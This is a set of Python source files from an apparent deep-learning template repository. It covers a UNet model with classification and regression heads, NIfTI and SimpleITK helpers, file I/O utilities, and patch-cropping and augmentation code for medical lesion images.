self.branch_1 = nn.Sequential(nn.Linear(height_mid_features * \
width_mid_features * \
512,
64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
self.branch_2 = nn.Sequential(nn.Linear(height * width, 64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
if n_classes is None:
self.regressor = nn.Sequential(nn.Linear(64 + 64, 1),
nn.ReLU())
else:
# self.fc1 = nn.Sequential(nn.Linear(64+64,16,bias=False),nn.ReLU(inplace=True))
self.fc = nn.Linear(64+64,n_classes,bias=False)
self.softmax = nn.LogSoftmax(dim=1)
# This layer is not connected anywhere
# It is only here for backward compatibility
self.lin = nn.Linear(1, 1, bias=False)
def forward(self, x):
batch_size = x.shape[0]
# print(batch_size)
x1 = self.inc(x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
x5 = self.down4(x4)
x6 = self.down5(x5)
x7 = self.down6(x6)
x8 = self.down7(x7)
x9 = self.down8(x8)
x = self.up1(x9, x8)
x = self.up2(x, x7)
x = self.up3(x, x6)
x = self.up4(x, x5)
x = self.up5(x, x4)
x = self.up6(x, x3)
x = self.up7(x, x2)
x = self.up8(x, x1)
x= self.outc(x)
        x = self.out_nonlin(x) # apply the sigmoid to the predicted map @20190924 by Xing
# Reshape Bx1xHxW -> BxHxW
# because probability map is real-valued by definition
x = x.squeeze(1)
x9_flat = x9.view(batch_size, -1)
x_flat = x.view(batch_size, -1)
# print(x9_flat.shape)
x10_flat = self.branch_1(x9_flat)
x_flat = self.branch_2(x_flat)
final_features = torch.cat((x_flat, x10_flat), dim=1)
if self.n_classes is None:
regression = self.regressor(final_features)
return x, regression
else:
if self.n_classes == 1:
classification = self.out_nonlin(self.fc(final_features))
else:
classification = self.softmax(self.fc(final_features))
return x,classification
if __name__ == "__main__":
num_classes = 5
input_tensor = torch.autograd.Variable(torch.rand(6, 3, 512, 512)).cuda()
# model = resnet50(class_num=num_classes)
model = UNet(n_channels=3,n_classes=num_classes,height=512,width=512).cuda()
output = model(input_tensor)
print(output)
<file_sep>"""Unility functions for manipulatiing nifti (.nii) files"""
import SimpleITK as sitk
import numpy as np
from matplotlib import pylab as plt
def load_image_array_from_nii(nii_path):
sitk_img = sitk.ReadImage(nii_path)
image_array_3d = sitk.GetArrayFromImage(sitk_img)
return image_array_3d
def load_sitk_image(nii_path):
sitk_img = sitk.ReadImage(nii_path)
return sitk_img
def write_array_to_nii(image_array_3d, header_itk_img=None, output_path=None):
"""Write array to itk image with optional header
Args:
image_array_3d: image array to write array to
header_itk_img: optional, itk image to copy header from
output_path:
Returns:
"""
img_aligned = sitk.GetImageFromArray(image_array_3d)
if header_itk_img is not None:
try:
try:
img_aligned.CopyInformation(header_itk_img)
except:
img_aligned.SetDirection(header_itk_img.GetDirection())
img_aligned.SetOrigin(header_itk_img.GetOrigin())
img_aligned.SetSpacing(header_itk_img.GetSpacing())
except:
# for 2d nii image, there is no such header info
print('Cannot copy header from {}'.format(header_itk_img))
if output_path:
print('Writing to {}'.format(output_path))
sitk.WriteImage(img_aligned, output_path)
return img_aligned
def resample_3d_by_spacing(seg_img, new_spacing=(1, 1, 1)):
"""Resample seg_img with new_spacing
Args:
seg_img:
new_spacing:
Returns:
"""
old_spacing = seg_img.GetSpacing()
new_spacing = new_spacing
new_size = tuple(np.array(seg_img.GetSize()) * np.array(old_spacing) / np.array(new_spacing))
new_size = [int(x) for x in new_size]
resampled_seg_img = sitk.Resample(seg_img, new_size, sitk.Transform(),
sitk.sitkNearestNeighbor, seg_img.GetOrigin(),
new_spacing, seg_img.GetDirection(), 0.0,
seg_img.GetPixelIDValue())
return resampled_seg_img
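# Illustrative sketch (not part of the original file): resample a volume to
# isotropic 1mm spacing and write it next to the input. The path is hypothetical.
def _example_resample_to_isotropic(nii_path='/tmp/ct_volume.nii'):
    sitk_img = load_sitk_image(nii_path)
    resampled_img = resample_3d_by_spacing(sitk_img, new_spacing=(1, 1, 1))
    resampled_array = sitk.GetArrayFromImage(resampled_img)
    # copy the resampled header so spacing/origin/direction are preserved on disk
    write_array_to_nii(resampled_array, header_itk_img=resampled_img,
                       output_path=nii_path.replace('.nii', '_1mm.nii'))
    return resampled_array.shape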
def myshow(img, spacing=None, title=None, figsize=(6, 6), fig=None):
"""
Args:
img: sitk image or numpy array
spacing:
title:
Returns:
"""
if isinstance(img, np.ndarray):
nda = img
else:
nda = sitk.GetArrayViewFromImage(img)
if spacing is None:
if isinstance(img, np.ndarray):
spacing = (1, 1)
else:
spacing = img.GetSpacing()
ysize, xsize = nda.shape[:2]
if fig is None:
fig = plt.figure(title, figsize=figsize)
extent = (0, xsize * spacing[1], ysize * spacing[0], 0)
t = plt.imshow(nda,
extent=extent,
interpolation='hamming',
cmap='gray',
origin='upper')
# plt.colorbar()
if (title):
plt.title(title)
return fig
<file_sep># template
My own deep learning template.
A starting point for many of my projects. It contains the following:
1. data generation and preprocessing;
2. dataset generator with a balanced sampler;
3. training with a cosine learning-rate schedule for both ResNet and UNet/GAN models;
4. TensorFlow utilities;
5. evaluation.
More to come.
<file_sep>"""This file contains utility functions used for file io"""
import cv2
import pandas as pd
import os
import json
import errno
import shutil
import numpy as np
import glob2
from PIL import Image
import nibabel as nib
import logging
from matplotlib import pylab as plt
def maybe_make_new_dir(new_directory):
""" Make directory if it does not already exist """
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
if not os.path.exists(new_directory):
os.makedirs(new_directory)
logging.debug('Making new directory {}'.format(new_directory))
def copy_tree(from_folder, to_folder, **kwargs):
"""Recursively copies from one folder to another
    This function is a wrapper for distutils.dir_util.copy_tree() that skips copying time and mode.
    Often time and mode are not important, but copying them sometimes causes permission errors.
    This wrapper by default just copies the files and ignores such errors.
Args:
from_folder:
to_folder:
Returns:
"""
from distutils.dir_util import copy_tree
preserve_times = kwargs.pop('preserve_times', 0)
preserve_mode = kwargs.pop('preserve_mode', 0)
update = kwargs.pop('update', 0)
copy_tree(from_folder, to_folder,
preserve_times=preserve_times,
preserve_mode=preserve_mode,
update=update,
**kwargs)
def overwrite_guard(output_dir):
"""If the output_dir folder already exists and is non-empty, throw an error
Args:
output_dir:
Returns:
None
"""
#
if os.path.isdir(output_dir) and os.listdir(output_dir):
msg = 'Output folder is not empty: {}\nDo you still want to proceed?'.format(output_dir)
shall = input("%s (y/N) " % msg).lower() == 'y'
if not shall:
raise FileExistsError('Please empty {} and proceed.'.format(output_dir))
else:
maybe_make_new_dir(output_dir)
def load_image_to_array(path, dtype=np.float32, mode='unchanged'):
"""Load image to array"""
try:
if mode == 'rgb':
# load as RGB
image_array = np.array(cv2.imread(path, 1), dtype)
elif mode == 'unchanged':
image_array = np.array(cv2.imread(path, -1), dtype)
elif mode == 'gray':
image_array = np.array(cv2.imread(path, 0), dtype)
else:
raise ValueError('unsupported mode')
except:
if path.endswith('.nii'):
image_array = nib.load(path).get_fdata().T
else:
raise IOError('Cannot open {}'.format(path))
return image_array
def silentremove(filepath):
"""Remove a filename if it exists
Args:
filepath: path to the file to be removed
Returns:
"""
try:
os.remove(filepath)
except OSError as e: # this would be "except OSError, e:" before Python 2.6
if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory
raise # re-raise exception if a different error occurred
def read_list_from_txt(txt_file, sep=',', field=None):
"""
Get a list of filepath from a txt file
Args:
txt_file: file path to a txt, each line of it contains a file path.
If there are more than one comma separated field, get the field_idx'th field
        field: optional, index of field to extract; if None, read the whole line
Return:
file_path_list: a list of file paths
"""
with open(txt_file, 'r') as f_in:
lines = f_in.readlines()
if field is None:
file_path_list = [line.strip() for line in lines]
else:
file_path_list = [np.array(line.strip().split(sep))[field].tolist() for line in lines]
return file_path_list
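# Illustrative sketch (not part of the original file): given a comma separated txt
# with lines like "images/img_001.png,1", pull out the paths, the labels, or the
# raw lines. The file path below is hypothetical.
def _example_read_list_from_txt(txt_file='/tmp/train_list.txt'):
    path_list = read_list_from_txt(txt_file, sep=',', field=0)
    label_list = read_list_from_txt(txt_file, sep=',', field=1)
    raw_lines = read_list_from_txt(txt_file)  # field=None keeps the whole line
    return path_list, label_list, raw_lines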
def get_list_of_filepath_from_txt(txt_file, field=0):
"""
Get a list of filepath from a txt file
"""
    return read_list_from_txt(txt_file, field=field)
def get_list_of_labels_from_txt(txt_file, field=1):
"""
    Get a list of labels from a txt file
    """
    return read_list_from_txt(txt_file, field=field)
def dump_list_to_file(filename_list, txt_file, name='', label_list=[]):
"""
    Write a list of filenames to a text file, optionally with corresponding labels
Args:
filename_list: a list of filenames
txt_file: file to a text file to write list to
name: optional, name of the list
label_list: optional, list of labels corresponding to filename_list
Return:
None
"""
print('Writing list {} of length {} to txt file {}'.format(name, len(filename_list), txt_file))
with open(txt_file, 'w', encoding='utf-8') as f_out:
if label_list:
assert len(filename_list) == len(label_list), 'filename_list and label_list must have the same length!'
for filename, label in zip(filename_list, label_list):
f_out.write('{},{}\n'.format(filename, label))
else:
for filename in filename_list:
f_out.write('{}\n'.format(filename))
def substitute_string_in_txt(old_string, new_string, filepath):
"""
Substitute old_string with new_string in text file filepath
"""
backup_filepath = filepath + '.tmp'
shutil.copyfile(filepath, backup_filepath)
new_filepath = '/tmp/tmp.txt'
with open(new_filepath, 'w') as f_out:
with open(backup_filepath, 'r') as f_in:
for line in f_in:
newline = line.replace(old_string, new_string)
f_out.write(newline)
shutil.copyfile(new_filepath, filepath)
def remove_leading_char_a(filepath):
"""Remove the leading character `a` in the image file name to match original nih dataset"""
file_dir = os.path.dirname(filepath)
basename = os.path.basename(filepath)[1:]
new_filepath = os.path.join(file_dir, basename)
return new_filepath
def list_file_in_directory(directory, ext='', path_level='noext', depth=1):
"""
List files in a directory.
Args:
directory:
ext: extension (suffix) to search directory for
path_level: optional. Default to 'noext'. It can take the following values:
'full': full path
'partial': partial path starting from directory
'basename': basename
'noext': basename without extension
depth: can be 1 or -1 (recursive).
Returns:
A list of filenames
"""
# make sure there is one and only one separator char at the end of directory
directory = directory.rstrip(os.path.sep) + os.path.sep
if depth == 1:
filepath_list = glob2.glob(os.path.join(directory, '*' + ext))
elif depth == -1:
filepath_list = glob2.glob(os.path.join(directory, '**', '*' + ext))
else:
raise ValueError('`depth` can only be 1 or -1 (recursive)!')
filepath_list = [filepath for filepath in filepath_list if os.path.isfile(filepath)]
if path_level == 'full':
return filepath_list
if path_level == 'partial':
filepath_list = [filepath.replace(directory, '') for filepath in filepath_list]
if path_level == 'basename':
filepath_list = [os.path.basename(filepath) for filepath in filepath_list]
if path_level == 'noext':
filepath_list = [os.path.splitext(os.path.basename(filepath))[0] for filepath in filepath_list]
return filepath_list
def get_ignore_file_list(raw_dir, cleaned_dir, ext=''):
"""
Get a list of files that are in raw_dir but not in cleaned_dir
Args:
raw_dir:
cleaned_dir:
Returns:
list_to_ignore: a list of file names to ignore
"""
raw_filelist = list_file_in_directory(raw_dir, ext=ext, path_level='basename')
cleaned_filelist = list_file_in_directory(cleaned_dir, ext=ext, path_level='basename')
print(len(raw_filelist))
print(len(cleaned_filelist))
list_to_ignore = list(set(raw_filelist) - set(cleaned_filelist))
return list_to_ignore
def read_image_from_path(image_path, channels=3):
"""Read image from a file
Args:
image_path: path to the image file
channels: can be 1 or 3. If 1, then the shape of image_array is (height, width). If 3,
the shape of image_array is (height, width, 3)
Returns:
image_array
"""
assert channels in [1, 3]
    image_array = plt.imread(image_path)
if channels == 3:
if len(image_array.shape) == 2:
image_array = np.dstack([image_array] * 3)
assert len(image_array.shape) == 3 and image_array.shape[-1] == 3
if channels == 1:
assert len(image_array.shape) == 2
return image_array
def filter_list(input_list, key_fn=(lambda x: x), filter_keys=None):
"""Filter a list with a list of keys
Args:
input_list: list to be filtered
key_fn: a function to generate keys from elements in the list
filter_keys: keys to intersect with
Returns:
filtered_input_list: filtered list
"""
if filter_keys is None:
filtered_input_list = input_list
else:
input_dict = {key_fn(x): x for x in input_list}
keys = set(input_dict.keys()) & set(filter_keys)
keys = sorted(list(keys))
filtered_input_list = [input_dict[key] for key in keys]
return filtered_input_list
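# Illustrative sketch (not part of the original file): keep only the image paths
# whose basename (without extension) appears in a whitelist of case ids.
def _example_filter_list():
    image_paths = ['/data/a/case_001.png', '/data/b/case_002.png', '/data/c/case_003.png']
    wanted_ids = ['case_001', 'case_003']
    key_fn = lambda path: os.path.splitext(os.path.basename(path))[0]
    filtered = filter_list(image_paths, key_fn=key_fn, filter_keys=wanted_ids)
    # filtered == ['/data/a/case_001.png', '/data/c/case_003.png']
    return filtered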
def load_json(json_path):
with open(json_path, 'r') as f_in:
data_dict = json.load(f_in)
return data_dict
def write_json(data_dict, json_path):
with open(json_path, "w", encoding='utf-8') as f:
json.dump(data_dict, f, indent=4, sort_keys=True)<file_sep>"""This file includes utility functions and classes for multiscale patch crop"""
import tensorflow as tf
import cv2
import re
import shutil
import json
import glob2
import logging
import matplotlib.pyplot as plt
import numpy as np
import os
import random
from skimage import measure
from tqdm import tqdm
from projects.drutils import fileio
from projects.drutils import augmentation
plt.rcParams['image.cmap'] = 'gray'
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
def generate_maskinfo(np_mask):
"""Return the mask corner and center coordinates
Args:
np_mask(numpy.array): the mask image, should be binary {0, 1}
Returns:
corners(list of float): [xmin(axis=0), ymin, xmax, ymax]
centers(list of float): [centerx, centery]
"""
# NB. The order of numpy is always in (y, x) or (row, col)
y, x = np.where(np_mask == np.max(np_mask))
xmin, xmax = min(x), max(x)
ymin, ymax = min(y), max(y)
corners = [xmin, ymin, xmax, ymax]
centers = [int((xmin + xmax) / 2), int((ymin + ymax) / 2)]
return corners, centers
def get_lesion_size_ratio(corners, patch_shape):
"""Compute bbox to patch size ratio
Args:
        corners: tightest bbox coordinates of the lesion (xmin, ymin, xmax, ymax)
patch_shape: in the order of (y_size, x_size)
Returns:
lesion_size_ratio: sqrt(lesion_area / patch_area)
"""
xmin, ymin, xmax, ymax = corners
h, w = patch_shape
lesion_size_ratio = ((xmax - xmin) * (ymax - ymin) / (h * w)) ** 0.5
return lesion_size_ratio
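# Illustrative sketch (not part of the original file): a 256x128 bbox inside a
# 512x512 patch covers 1/8 of the area, so the size ratio is sqrt(1/8) ~= 0.35.
def _example_lesion_size_ratio():
    corners = [100, 200, 356, 328]  # xmin, ymin, xmax, ymax -> 256 x 128 bbox
    return get_lesion_size_ratio(corners, patch_shape=(512, 512))  # ~0.354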
def generate_rotate_list(rotations_per_axis=6, max_degree=30):
"""generate a list of degrees randomly
Args:
rotations_per_axis(integer): the number of degrees
max_degree(float): the max degree will rotate
Returns:
degrees(list of float): from -max_degree to +max_degree
"""
# oversample by 20 times and select #rotation_per_axis numbers
degrees = []
if rotations_per_axis >= 1:
degrees.extend(np.random.choice(
np.arange(-max_degree, max_degree, max_degree / (20 * rotations_per_axis)), size=rotations_per_axis))
return degrees
def generate_negative_sample(image_path, label_path, patch_size, neg_imagedir, isrotate=False,
ignore_padding=0,
n_patches=20,
key='',
nonezero_threshold=0.5,
scale=1.0,
resize_jitter_list=[0.75, 1.25],
max_trial_per_patch=5):
"""
    Generate negative samples: randomly choose candidate crop centers and keep patches whose central region contains no lesion and has enough non-zero pixels
Args:
image_path(str)
label_path(str): if empty, then use an all zero mask
patch_size(int)
neg_imagedir(str)
Returns:
None
"""
assert image_path
image = cv2.imread(image_path, -1)
if label_path:
label = cv2.imread(label_path, -1)
else:
print('Use all zero mask!')
label = np.zeros_like(image, dtype=np.uint8)
target_size = np.array([patch_size * 3, patch_size * 2])
max_trial = n_patches * max_trial_per_patch # for each patch try up to max_trial_per_patch times
i = 0
trial = 0
max_nonzero_ratio = 0
while trial <= max_trial and i < n_patches:
trial += 1
resize_ratio_lower, resize_ratio_upper = resize_jitter_list
resize_jitter = np.random.uniform(resize_ratio_lower, resize_ratio_upper)
image_resize = augmentation.resize(image, scale=resize_jitter*scale)
label_resize = augmentation.resize(label, scale=resize_jitter*scale)
image_resize_shape = np.asarray(image_resize.shape)
if np.any(image_resize_shape < target_size):
target_size = np.maximum(target_size, image_resize_shape)
image_pad = augmentation.center_pad(image_resize, target_size)
label_pad = augmentation.center_pad(label_resize, target_size)
# Generate rotation angle randomly
if isrotate:
degree = generate_rotate_list(rotations_per_axis=1, max_degree=180)
            M = cv2.getRotationMatrix2D((image_pad.shape[1]/2, image_pad.shape[0]/2), degree[0], 1) # the rotation center must be an (x, y) tuple
            image_rotate = cv2.warpAffine(image_pad, M, (image_pad.shape[1], image_pad.shape[0]))
            label_rotate = cv2.warpAffine(label_pad, M, (image_pad.shape[1], image_pad.shape[0]))
image_aug = image_rotate
label_aug = label_rotate
else:
image_aug = image_pad
label_aug = label_pad
y = random.randint(patch_size / 2, image_aug.shape[0] - patch_size / 2)
x = random.randint(patch_size / 2, image_aug.shape[1] - patch_size / 2)
label_patch = label_aug[int(y - patch_size / 2): int(y + patch_size / 2),
int(x - patch_size / 2): int(x + patch_size / 2)]
image_patch = image_aug[int(y - patch_size / 2): int(y + patch_size / 2),
int(x - patch_size / 2): int(x + patch_size / 2)]
        if ignore_padding > 0:
            central_label_patch = label_patch[ignore_padding:-ignore_padding, ignore_padding:-ignore_padding]
            central_image_patch = image_patch[ignore_padding:-ignore_padding, ignore_padding:-ignore_padding]
        else:
            # avoid empty [0:-0] slices when no padding should be ignored
            central_label_patch = label_patch
            central_image_patch = image_patch
nonzero_ratio = np.count_nonzero(central_image_patch) / central_image_patch.size
if not central_label_patch.any():
max_nonzero_ratio = max(max_nonzero_ratio, nonzero_ratio)
if nonzero_ratio >= nonezero_threshold:
print('============', nonzero_ratio)
i += 1
neg_patch = image_patch
neg_path = os.path.join(neg_imagedir, key, "{}_neg{:03d}_scale{:.2f}.png".format(key, i, scale))
neg_label_path = os.path.join(neg_imagedir, key, "{}_neg{:03d}_scale{:.2f}_mask.png".format(key, i, scale))
fileio.maybe_make_new_dir(os.path.dirname(neg_path))
fileio.maybe_make_new_dir(os.path.dirname(neg_label_path))
if neg_patch.shape == (patch_size, patch_size) and label_patch.shape == (patch_size, patch_size):
cv2.imwrite(neg_path, neg_patch)
cv2.imwrite(neg_label_path, label_patch)
else:
continue
print('max_nonzero_ratio', max_nonzero_ratio)
def stratefied_sampling_neg_and_pos(positive_patch_search_path,
negative_patch_search_path,
strata_regex_pattern,
positive_dir,
negative_dir,
output_dir,
max_ratio=2,
seed=42):
"""Sample from positive and negative
Args:
positive_patch_search_path:
negative_patch_search_path:
strata_regex_pattern:
positive_dir:
negative_dir:
        output_dir: output directory that sampled patches are copied into
max_ratio:
seed: random seed for shuffling
Returns:
None
"""
positive_files = glob2.glob(positive_patch_search_path)
positive_files = [file for file in positive_files if re.search(strata_regex_pattern, file)]
negative_files = glob2.glob(negative_patch_search_path)
negative_files = [file for file in negative_files if re.search(strata_regex_pattern, file)]
n_pos = len(positive_files)
n_neg = len(negative_files)
# if too many negatives, truncate at max_ratio
if n_neg > n_pos * max_ratio:
print('Truncate from {} to {} files'.format(n_neg, n_pos * max_ratio))
negative_files = sorted(negative_files)
np.random.seed(seed)
np.random.shuffle(negative_files)
negative_files = negative_files[:(n_pos * max_ratio)]
# copy files
for source_file in tqdm(positive_files):
new_file = source_file.replace(positive_dir, output_dir)
# print('{} --> {}'.format(source_file, new_file))
fileio.maybe_make_new_dir(os.path.dirname(new_file))
shutil.copyfile(source_file, new_file)
# copy images
shutil.copyfile(source_file.replace('_mask', ''), new_file.replace('_mask', ''))
for source_file in tqdm(negative_files):
new_file = source_file.replace(negative_dir, output_dir)
# print('{} --> {}'.format(source_file, new_file))
fileio.maybe_make_new_dir(os.path.dirname(new_file))
shutil.copyfile(source_file, new_file)
# copy images
shutil.copyfile(source_file.replace('_mask', ''), new_file.replace('_mask', ''))
def affine_crop(image_array, crop_center, patch_shape, rotate_angle=0, mode='constant'):
"""Core function for rotation and crop patch
Args:
image_array(np.array): The original image
crop_center(tuple): The center coordinate to crop (x,y)
patch_shape(tuple): The final patch size, tuples of int (width, height)
rotate_angle(float or int): rotation angle in degree unit
mode: np.pad mode, can be `constant` or `reflect`
Returns:
np array, cropped patch array
"""
if mode == 'reflect':
x_center, y_center = crop_center
w_patch, h_patch = patch_shape
h_image, w_image = np.array(image_array.shape)
xpad1 = -min(0, x_center - w_patch//2)
xpad2 = max(0, x_center + (w_patch + 1)//2 - w_image)
ypad1 = -min(0, y_center - h_patch//2)
ypad2 = max(0, y_center + (h_patch + 1)//2 - h_image)
image_array = np.pad(image_array, ((ypad1, ypad2), (xpad1, xpad2)), mode=mode)
        crop_center = np.array(crop_center) + np.array((xpad1, ypad1))
radian = rotate_angle * np.pi / 180
rot_mat = np.asarray([[np.cos(radian), -np.sin(radian)],
[np.sin(radian), np.cos(radian)]])
# if dst_center is not int, it will run into unfaithful cropping when patch_size is odd number
dst_center = (np.asarray(patch_shape).reshape(-1, 1) / 2).astype(np.int)
trans_mat = dst_center - np.matmul(rot_mat, np.asarray(crop_center).reshape(2,1))
dst_point = np.asarray([[0,0], [patch_shape[0], 0], [patch_shape[0], patch_shape[1]], [0, patch_shape[1]]]).T
src_point = np.matmul(np.linalg.inv(rot_mat), (dst_point - trans_mat)).T
M = cv2.getPerspectiveTransform(src_point.astype(np.float32), dst_point.T.astype(np.float32))
patch_array = cv2.warpPerspective(image_array, M, patch_shape)
return patch_array
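# Illustrative sketch (not part of the original file): crop a 64x64 patch around a
# chosen (x, y) center from a synthetic image, with and without a 30 degree rotation.
def _example_affine_crop():
    image_array = np.random.rand(256, 256).astype(np.float32)
    straight_patch = affine_crop(image_array, crop_center=(120, 140),
                                 patch_shape=(64, 64), rotate_angle=0)
    rotated_patch = affine_crop(image_array, crop_center=(120, 140),
                                patch_shape=(64, 64), rotate_angle=30)
    return straight_patch.shape, rotated_patch.shape  # both (64, 64)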
def translate(crop_center, translation):
"""Translate the cropping center
Args:
crop_center: np array or list (x, y)
translation: np array with the same shape as crop_center (x and y can be different)
Return:
np array: translated crop_center
"""
crop_center = np.asarray(crop_center) + translation
return crop_center
def get_crop_center_and_size_from_bbox(bbox):
"""Return crop center and size from bbox quadruple
Note that the center and size are in the order of (x, y)
Args:
bbox:
Returns:
"""
ymin, xmin, ymax, xmax = bbox
crop_center = [int((xmin + xmax) / 2), int((ymin + ymax) / 2)]
crop_size = [xmax - xmin, ymax - ymin]
return crop_center, crop_size
class BaseROICropper2D(object):
"""Base class for cropping ROIs from a single image
Args:
image_path:
output_dir:
patch_size:
mask_path:
"""
def __init__(self, image_path, output_dir, patch_size=512, mask_path=None):
self.image_path = image_path
self.output_dir = output_dir
self.mask_path = mask_path
self.patch_size = patch_size
self.name = os.path.basename(image_path).split(".")[0].split("_")[0]
def load_image_arrays(self):
image_array = cv2.imread(self.image_path, -1)
if self.mask_path is not None:
mask_array = cv2.imread(self.mask_path, -1)
else:
mask_array = None
return image_array, mask_array
@staticmethod
def crop_once(image_array, crop_center, patch_shape, scale=1.0, aug_param_dict={}):
"""Crop image_array based on center, patch_shape and augmentation parameters
Args:
image_array:
crop_center:
            patch_shape: shape of cropped patches in the original image. If None, infer
from scale by (patch_size / scale, patch_size / scale)
scale: the smaller the scale is, the larger the original patch is
aug_param_dict:
Returns:
np array, cropped image array
"""
# If aug_param_dict is empty, default to no augmentation
rotate_angle = aug_param_dict.get('rotate_angle', 0)
translation = aug_param_dict.get('translation', 0)
is_flip = aug_param_dict.get('is_flip', False)
resize_jitter = aug_param_dict.get('resize_jitter', 1)
scale *= resize_jitter
translation = np.asarray(translation / scale).astype(np.int)
crop_center = translate(crop_center, translation)
patch_shape = tuple(patch_shape) # this is required by cv2.warpPerspective
patch_image_array = affine_crop(image_array, crop_center, patch_shape, rotate_angle)
if is_flip:
patch_image_array = np.fliplr(patch_image_array)
return patch_image_array
class DetectedROICropper2D(BaseROICropper2D):
"""Crop ROIs from a single image according to a list of detection bboxes and corresponding scales
Args:
image_path:
output_dir:
bbox_dict_path_list: a list of path to bbox_dict json files. The bbox_dict has (name, info_dict) pair, and
info_dict has at least the following fields:
pred_bbox_list:
pred_box_correct:
gt_bbox_list:
gt_box_covered:
scale_list:
patch_size:
mask_path:
        crop_by_bbox_size: if True, use the (optionally dilated) detection bbox size as the crop size,
            otherwise crop a fixed patch_size / scale window around the bbox center
        bbox_dilation_ratio: ratio to dilate the bbox for cropping
        bbox_dilation_size: absolute margin (in pixels) added when dilating the bbox for cropping
crop_mode: could be one of the following
'square': crop a square with the side of max(patch_shape) centered at the bbox center
'bbox': crop according to the bbox (the final patch may not be square)
"""
def __init__(self, image_path, output_dir, bbox_dict_path_list, scale_list,
patch_size=512, mask_path=None, suffix='.png',
crop_by_bbox_size=False, do_resize=True,
bbox_dilation_ratio=1.0, bbox_dilation_size=0,
crop_mode='square'):
super(DetectedROICropper2D, self).__init__(image_path=image_path, output_dir=output_dir,
patch_size=patch_size, mask_path=mask_path)
self.bbox_dict_path_list = bbox_dict_path_list
self.scale_list = scale_list
self.suffix = suffix
self.crop_by_bbox_size = crop_by_bbox_size
self.bbox_dilation_ratio = bbox_dilation_ratio
self.bbox_dilation_size = bbox_dilation_size
self.crop_mode = crop_mode
self.do_resize = do_resize
assert self.crop_mode in ['square', 'bbox']
def load_bboxes(self, bbox_dict_path):
# load bbox_list for an image from bbox_dict_path
with open(bbox_dict_path, 'r') as f_in:
bbox_dict = json.load(f_in)
if self.name in bbox_dict:
bbox_list = bbox_dict[self.name]['pred_bbox_list']
bbox_iscorrect_list = bbox_dict[self.name]['pred_box_correct']
else:
bbox_list = []
bbox_iscorrect_list = []
return bbox_list, bbox_iscorrect_list
def write_arrays(self, image_sample, output_dir, name, scale, bbox_idx, iscorrect=False, label_sample=None, suffix='.png'):
tp_or_fp_string = 'TP' if iscorrect else 'FP'
if not os.path.isdir(os.path.join(output_dir, name)):
os.mkdir(os.path.join(output_dir, name))
out_imagepath = os.path.join(
output_dir, name, "{}_{:03d}_{}_scale{:.2f}{}".format(name, bbox_idx, tp_or_fp_string, scale, suffix))
cv2.imwrite(out_imagepath, image_sample)
if label_sample is not None:
            out_labelpath = os.path.join(
                output_dir, name, "{}_{:03d}_{}_scale{:.2f}_mask{}".format(name, bbox_idx, tp_or_fp_string, scale, suffix))
cv2.imwrite(out_labelpath, label_sample)
def crop_by_bbox_list(self, image_array, bbox_list, bbox_iscorrect_list, scale):
for bbox_idx, (bbox, iscorrect) in enumerate(zip(bbox_list, bbox_iscorrect_list)):
crop_center, crop_size = get_crop_center_and_size_from_bbox(bbox)
if self.crop_by_bbox_size:
logging.debug('raw crop_size {}'.format(crop_size))
crop_size = np.array(crop_size) * self.bbox_dilation_ratio + 2 * self.bbox_dilation_size
logging.debug('adjusted crop_size {}'.format(crop_size))
if self.crop_mode == 'square':
patch_shape = np.array([max(crop_size), max(crop_size)]).astype(int)
elif self.crop_mode == 'bbox':
patch_shape = crop_size.astype(int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape, scale=scale)
if self.do_resize:
patch_image_array = augmentation.resize(patch_image_array,
dst_shape=(self.patch_size, self.patch_size))
else:
patch_shape = np.asarray([self.patch_size / scale, self.patch_size / scale]).astype(np.int)
patch_image_array = self.crop_once(image_array, crop_center, patch_shape=patch_shape, scale=scale)
assert patch_image_array.shape == (self.patch_size, self.patch_size)
self.write_arrays(image_sample=patch_image_array, label_sample=None,
output_dir=self.output_dir,
name=self.name, scale=scale,
bbox_idx=bbox_idx, iscorrect=iscorrect, suffix=self.suffix)
def deploy(self):
image_array, mask_array = self.load_image_arrays()
for bbox_dict_path, scale in zip(self.bbox_dict_path_list, self.scale_list):
bbox_list, bbox_iscorrect_list = self.load_bboxes(bbox_dict_path)
self.crop_by_bbox_list(image_array, bbox_list, bbox_iscorrect_list, scale)
class AugmentedROICropper2D(BaseROICropper2D):
"""Crop augmented ROIs from a single image (and corresponding mask)
Total images = nb_scales * 1 *(1+nb_rotations)*nb_labels
Args:
image_path: str, the path to image
mask_path: str, the path to mask
output_dir: str, the output directory for both images and labels
patch_size: int, size of final patch (square)
max_degree: float: the maximum degree of rotation
max_translation: int, the maximum value of translation
upscales: list of float, if the mass is too small, resize the image with upscales
downscales: list of float, if the mass is too big, resize the image with downscales
        size_range: tuple of two floats, lower and upper bound of the ratio of mass_size / patch_size
        resize_jitter_range: tuple of two floats, lower and upper bound of the random resizing factor
do_flip: bool, if true, perform random horizontal flip
"""
def __init__(self, image_path, mask_path, output_dir,
patch_size=512, n_patches=1,
max_degree=0, max_translation=0,
upscales=(2.,), downscales=(0.5, 0.25, 0.125),
size_range=(0.25, 0.5),
resize_jitter_range=(1., 1.),
do_flip=False):
super(AugmentedROICropper2D, self).__init__(image_path=image_path, output_dir=output_dir,
patch_size=patch_size, mask_path=mask_path)
self.do_flip = do_flip
self.max_degree = max_degree
self.max_translation = max_translation
self.resize_jitter_range = resize_jitter_range
self.n_patches = n_patches
self.n_lesions = 0
self.upscales = upscales
self.downscales = downscales
self.size_range = size_range
def sample_augmentation_param(self):
"""Sample degree, translation, resize_jitter
From self.max_degree and self.max_translation and self.resize_jitter_range
"""
translation = np.random.randint(-self.max_translation // 2, self.max_translation // 2 + 1, size=2)
degree = random.uniform(-self.max_degree, self.max_degree)
resize_ratio_lower, resize_ratio_upper = self.resize_jitter_range
resize_jitter = random.uniform(resize_ratio_lower, resize_ratio_upper)
is_flip = self.do_flip and (random.uniform(0,1) > 0.5)
aug_param_dict = {}
aug_param_dict['rotate_angle'] = degree
aug_param_dict['translation'] = translation
aug_param_dict['resize_jitter'] = resize_jitter
aug_param_dict['is_flip'] = is_flip
return aug_param_dict
def get_lesion_masks_and_scales(self, mask_array):
"""Determine the scales to crop patches based on the lesion size
Args:
mask_array: the mask array
Return:
tuple of list: a list of lesion masks, a list of scales for each lesion in the mask
"""
